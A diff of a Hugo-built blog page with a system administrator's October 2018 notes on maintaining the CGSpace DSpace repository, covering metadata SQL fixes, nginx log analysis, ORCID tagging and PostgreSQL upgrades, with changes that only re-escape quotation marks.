<li>Those items are from Ghana, so the submitter apparently thought <code>gh</code> was a language&hellip; I can safely delete them:</li>
</ul>
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
DELETE 2
</code></pre><ul>
<li>The next issue would be <code>jn</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
<pre tabindex="0"><code>dspace=# SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
resource_id
-------------
94001
@ -718,12 +718,12 @@ dspace=# SELECT handle,item_id FROM item, handle WHERE handle.resource_type_id=2
<li>Those items are about Japan, so I will update them to be <code>ja</code></li>
<li>Other replacements:</li>
</ul>
<pre tabindex="0"><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='gh';
UPDATE metadatavalue SET text_value='fr' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='fn';
UPDATE metadatavalue SET text_value='hi' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='in';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='Ja';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jn';
UPDATE metadatavalue SET text_value='ja' WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'language' and qualifier = 'iso') AND text_value='jp';
<pre tabindex="0"><code>DELETE FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;gh&#39;;
UPDATE metadatavalue SET text_value=&#39;fr&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;fn&#39;;
UPDATE metadatavalue SET text_value=&#39;hi&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;in&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;Ja&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jn&#39;;
UPDATE metadatavalue SET text_value=&#39;ja&#39; WHERE resource_type_id=2 AND metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;language&#39; and qualifier = &#39;iso&#39;) AND text_value=&#39;jp&#39;;
</code></pre><ul>
<li>Then there are 12 items with <code>en|hi</code>, but they were all in one collection so I just exported it as a CSV and then re-imported the corrected metadata</li>
</ul>

View File

@ -26,7 +26,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
Phil Thornton got an ORCID identifier so we need to add it to the list on CGSpace and tag his existing items
I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nairobi right now
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -121,7 +121,7 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
<ul>
<li>I see Moayad was busy collecting item views and downloads from CGSpace yesterday:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
933 40.77.167.90
971 95.108.181.88
1043 41.204.190.40
@ -135,13 +135,13 @@ I created a GitHub issue to track this #389, because I&rsquo;m super busy in Nai
</code></pre><ul>
<li>Of those, about 20% were HTTP 500 responses (!):</li>
</ul>
<pre tabindex="0"><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Oct/2018&quot; | grep 34.218.226.147 | awk '{print $9}' | sort -n | uniq -c
<pre tabindex="0"><code>$ zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Oct/2018&#34; | grep 34.218.226.147 | awk &#39;{print $9}&#39; | sort -n | uniq -c
118927 200
31435 500
</code></pre><ul>
<li>I added Phil Thornton and Sonal Henson&rsquo;s ORCID identifiers to the controlled vocabulary for <code>cg.creator.orcid</code> and then re-generated the names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
<pre tabindex="0"><code>$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml | sort | uniq &gt; 2018-10-03-orcids.txt
$ ./resolve-orcids.py -i 2018-10-03-orcids.txt -o 2018-10-03-names.txt -d
</code></pre><ul>
<li>I found a new corner case error that I need to check, given <em>and</em> family names deactivated:</li>
@ -154,7 +154,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>Linode sent another alert about CPU usage on CGSpace (linode18) this evening</li>
<li>It seems that Moayad is making quite a lot of requests today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Oct/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Oct/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1594 157.55.39.160
1627 157.55.39.173
1774 136.243.6.84
@ -169,13 +169,13 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>But in super positive news, he says they are using my new <a href="https://github.com/alanorth/dspace-statistics-api">dspace-statistics-api</a> and it&rsquo;s MUCH faster than using Atmire CUA&rsquo;s internal &ldquo;restlet&rdquo; API</li>
<li>I don&rsquo;t recognize the <code>138.201.49.199</code> IP, but it is in Germany (Hetzner) and appears to be paginating over some browse pages and downloading bitstreams:</li>
</ul>
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /[a-z]+' | sort | uniq -c
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /[a-z]+&#39; | sort | uniq -c
8324 GET /bitstream
4193 GET /handle
</code></pre><ul>
<li>Suspiciously, it&rsquo;s only grabbing the CGIAR System Office community (handle prefix 10947):</li>
</ul>
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E 'GET /handle/[0-9]{5}' | sort | uniq -c
<pre tabindex="0"><code># grep 138.201.49.199 /var/log/nginx/access.log | grep -o -E &#39;GET /handle/[0-9]{5}&#39; | sort | uniq -c
7 GET /handle/10568
4186 GET /handle/10947
</code></pre><ul>
@ -187,19 +187,19 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>I looked in Solr&rsquo;s statistics core and these hits were actually all counted as <code>isBot:false</code> (of course)&hellip; hmmm</li>
<li>I tagged all of Sonal and Phil&rsquo;s items with their ORCID identifiers on CGSpace using my <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-10-03-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Where <code>2018-10-03-add-orcids.csv</code> contained:</li>
</ul>
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
&quot;Henson, Sonal P.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Henson, S.&quot;,Sonal Henson: 0000-0002-2002-5462
&quot;Thornton, P.K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phil&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Philip K.&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip&quot;,Philip Thornton: 0000-0002-1854-0182
&quot;Thornton, Phillip K.&quot;,Philip Thornton: 0000-0002-1854-0182
&#34;Henson, Sonal P.&#34;,Sonal Henson: 0000-0002-2002-5462
&#34;Henson, S.&#34;,Sonal Henson: 0000-0002-2002-5462
&#34;Thornton, P.K.&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Philip K&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phil&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Philip K.&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phillip&#34;,Philip Thornton: 0000-0002-1854-0182
&#34;Thornton, Phillip K.&#34;,Philip Thornton: 0000-0002-1854-0182
</code></pre><h2 id="2018-10-04">2018-10-04</h2>
<ul>
<li>Salem raised an issue that the dspace-statistics-api reports downloads for some items that have no bitstreams (like many limited access items)</li>
@ -214,7 +214,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>So it&rsquo;s fixed, but I&rsquo;m not sure why!</li>
<li>Peter wants to know the number of API requests per month, which was about 250,000 in September (exluding statlet requests):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E 'Sep/2018' | grep -c -v 'statlets'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest}.log* | grep -E &#39;Sep/2018&#39; | grep -c -v &#39;statlets&#39;
251226
</code></pre><ul>
<li>I found a logic error in the dspace-statistics-api <code>indexer.py</code> script that was causing item views to be inserted into downloads</li>
@ -243,7 +243,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>When I tried to force them to be generated I got an error that I&rsquo;ve never seen before:</li>
</ul>
<pre tabindex="0"><code>$ dspace filter-media -v -f -i 10568/97613
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf' @ error/constitute.c/ReadImage/412.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: not authorized `/tmp/impdfthumb5039464037201498062.pdf&#39; @ error/constitute.c/ReadImage/412.
</code></pre><ul>
<li>I see there was an update to Ubuntu&rsquo;s ImageMagick on 2018-10-05, so maybe something changed or broke?</li>
<li>I get the same error when forcing <code>filter-media</code> to run on DSpace Test too, so it&rsquo;s gotta be an ImageMagic bug</li>
@ -251,7 +251,7 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
<li>Wow, someone on <a href="https://twitter.com/rosscampbell/status/1048268966819319808">Twitter posted about this breaking his web application</a> (and it was retweeted by the ImageMagick acount!)</li>
<li>I commented out the line that disables PDF thumbnails in <code>/etc/ImageMagick-6/policy.xml</code>:</li>
</ul>
<pre tabindex="0"><code> &lt;!--&lt;policy domain=&quot;coder&quot; rights=&quot;none&quot; pattern=&quot;PDF&quot; /&gt;--&gt;
<pre tabindex="0"><code> &lt;!--&lt;policy domain=&#34;coder&#34; rights=&#34;none&#34; pattern=&#34;PDF&#34; /&gt;--&gt;
</code></pre><ul>
<li>This works, but I&rsquo;m not sure what ImageMagick&rsquo;s long-term plan is if they are going to disable ALL image formats&hellip;</li>
<li>I suppose I need to enable a workaround for this in Ansible?</li>
@ -274,9 +274,9 @@ $ sudo podman create --name dspacedb -v /home/aorth/.local/lib/containers/volume
$ sudo podman start dspacedb
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>I tried to make an Artifactory in podman, but it seems to have problems because Artifactory is distributed on the Bintray repository</li>
@ -311,7 +311,7 @@ COPY 10000
</code></pre><ul>
<li>Then I exported and applied them on my local test server:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t CORRECT -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2018-10-11-top-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t CORRECT -m 3
</code></pre><ul>
<li>I will apply these on CGSpace when I do the other updates tomorrow, as well as double check the high scoring ones to see if they are correct in Sisay&rsquo;s author controlled vocabulary</li>
</ul>
@ -321,7 +321,7 @@ COPY 10000
<li>Switch to new CGIAR LDAP server on CGSpace, as it&rsquo;s been running (at least for authentication) on DSpace Test for the last few weeks, and I think they old one will be deprecated soon (today?)</li>
<li>Apply Peter&rsquo;s 746 author corrections on CGSpace and DSpace Test using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-10-11-top-authors.csv -f dc.contributor.author -t CORRECT -m 3 -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Run all system updates on CGSpace (linode19) and reboot the server</li>
<li>After rebooting the server I noticed that Handles are not resolving, and the <code>dspace-handle-server</code> systemd service is not running (or rather, it exited with success)</li>
@ -356,20 +356,20 @@ COPY 10000
$ sudo docker run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2018-10-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><h2 id="2018-10-16">2018-10-16</h2>
<ul>
<li>Generate a list of the schema on CGSpace so CodeObia can compare with MELSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN 'dc' WHEN metadata_schema_id=2 THEN 'cg' END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \copy (SELECT (CASE when metadata_schema_id=1 THEN &#39;dc&#39; WHEN metadata_schema_id=2 THEN &#39;cg&#39; END) AS schema, element, qualifier, scope_note FROM metadatafieldregistry where metadata_schema_id IN (1,2)) TO /tmp/cgspace-schema.csv WITH CSV HEADER;
</code></pre><ul>
<li>Talking to the CodeObia guys about the REST API I started to wonder why it&rsquo;s so slow and how I can quantify it in order to ask the dspace-tech mailing list for help profiling it</li>
<li>Interestingly, the speed doesn&rsquo;t get better after you request the same thing multiple timesit&rsquo;s consistently bad on both CGSpace and DSpace Test!</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.35s user 0.06s system 1% cpu 25.133 total
0.31s user 0.04s system 1% cpu 25.223 total
@ -377,7 +377,7 @@ $ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser
0.20s user 0.05s system 1% cpu 23.838 total
0.30s user 0.05s system 1% cpu 24.301 total
$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.22s user 0.03s system 1% cpu 17.248 total
0.23s user 0.02s system 1% cpu 16.856 total
@ -389,7 +389,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
<li>I wonder if the Java garbage collector is important here, or if there are missing indexes in PostgreSQL?</li>
<li>I switched DSpace Test to the G1GC garbage collector and tried again and now the results are worse!</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 0% cpu 25.017 total
0.23s user 0.02s system 1% cpu 23.299 total
@ -399,7 +399,7 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
</code></pre><ul>
<li>If I make a request without the expands it is ten time faster:</li>
</ul>
<pre tabindex="0"><code>$ time http --print h 'https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://dspacetest.cgiar.org/rest/items?limit=100&amp;offset=0&#39;
...
0.20s user 0.03s system 7% cpu 3.098 total
0.22s user 0.03s system 8% cpu 2.896 total
@ -414,29 +414,29 @@ $ time http --print h 'https://dspacetest.cgiar.org/rest/items?expand=metadata,b
<li>Most of the are from Bioversity, and I asked Maria for permission before updating them</li>
<li>I manually went through and looked at the existing values and updated them in several batches:</li>
</ul>
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%CC BY %';
UPDATE metadatavalue SET text_value='CC-BY-NC-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-ND%' AND text_value LIKE '%by-nc-nd%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%BY-NC-SA%' AND text_value LIKE '%by-nc-sa%';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value LIKE '%/by/%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%/by/%' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-2.5' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
'%/by-nc%' AND text_value LIKE '%2.5%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%/by-nc%' AND text_value LIKE '%4.0%';
UPDATE metadatavalue SET text_value='CC-BY-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%zero%';
UPDATE metadatavalue SET text_value='CC-BY-NC-SA-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value LIKE '%4.0%' AND text_value LIKE '%Attribution-NonCommercial-ShareAlike%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%4.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-NC-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution-NonCommercial %';
UPDATE metadatavalue SET text_value='CC-BY-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%3.0%' AND text_value NOT LIKE '%zero%' AND text_value LIKE '%Attribution %';
UPDATE metadatavalue SET text_value='CC-BY-ND-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value='CC-BY' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE '%zero%' AND text_value NOT LIKE '%CC0%' AND text_value LIKE '%Attribution %' AND text_value NOT LIKE '%CC-%';
UPDATE metadatavalue SET text_value='CC-BY-NC-4.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%CC BY %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-ND%&#39; AND text_value LIKE &#39;%by-nc-nd%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%BY-NC-SA%&#39; AND text_value LIKE &#39;%by-nc-sa%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value LIKE &#39;%/by/%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%/by/%&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-2.5&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE
&#39;%/by-nc%&#39; AND text_value LIKE &#39;%2.5%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%/by-nc%&#39; AND text_value LIKE &#39;%4.0%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%zero%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-SA-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%4.0%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial-ShareAlike%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%4.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution-NonCommercial %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%3.0%&#39; AND text_value NOT LIKE &#39;%zero%&#39; AND text_value LIKE &#39;%Attribution %&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-ND-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78184;
UPDATE metadatavalue SET text_value=&#39;CC-BY&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value NOT LIKE &#39;%zero%&#39; AND text_value NOT LIKE &#39;%CC0%&#39; AND text_value LIKE &#39;%Attribution %&#39; AND text_value NOT LIKE &#39;%CC-%&#39;;
UPDATE metadatavalue SET text_value=&#39;CC-BY-NC-4.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND resource_id=78564;
</code></pre><ul>
<li>I updated the fields on CGSpace and then started a re-index of Discovery</li>
<li>We also need to re-think the <code>dc.rights</code> field in the submission form: we should probably use a popup controlled vocabulary and list the Creative Commons values with version numbers and allow the user to enter their own (like the ORCID identifier field)</li>
<li>Ask Jane if we can use some of the BDP money to host AReS explorer on a more powerful server</li>
<li>IWMI sent me a list of new ORCID identifiers for their staff so I combined them with our list, updated the names with my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script, and regenerated the controlled vocabulary:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt;
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml MEL\ ORCID.json MEL\ ORCID_V2.json 2018-10-17-IWMI-ORCIDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt;
2018-10-17-orcids.txt
$ ./resolve-orcids.py -i 2018-10-17-orcids.txt -o 2018-10-17-names.txt -d
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -458,7 +458,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0001-7930-5752
<li>I upgraded PostgreSQL to 9.6 on DSpace Test using Ansible, then had to manually <a href="https://wiki.postgresql.org/wiki/Using_pg_upgrade_on_Ubuntu/Debian">migrate from 9.5 to 9.6</a>:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o ' -c config_file=/etc/postgresql/9.5/main/postgresql.conf' -O ' -c config_file=/etc/postgresql/9.6/main/postgresql.conf'
$ /usr/lib/postgresql/9.6/bin/pg_upgrade -b /usr/lib/postgresql/9.5/bin -B /usr/lib/postgresql/9.6/bin -d /var/lib/postgresql/9.5/main -D /var/lib/postgresql/9.6/main -o &#39; -c config_file=/etc/postgresql/9.5/main/postgresql.conf&#39; -O &#39; -c config_file=/etc/postgresql/9.6/main/postgresql.conf&#39;
$ exit
# systemctl start postgresql
# dpkg -r postgresql-9.5 postgresql-client-9.5 postgresql-contrib-9.5
@ -468,7 +468,7 @@ $ exit
<li>Linode emailed me to say that CGSpace (linode18) had high CPU usage for a few hours this afternoon</li>
<li>Looking at the nginx logs around that time I see the following IPs making the most requests:</li>
</ul>
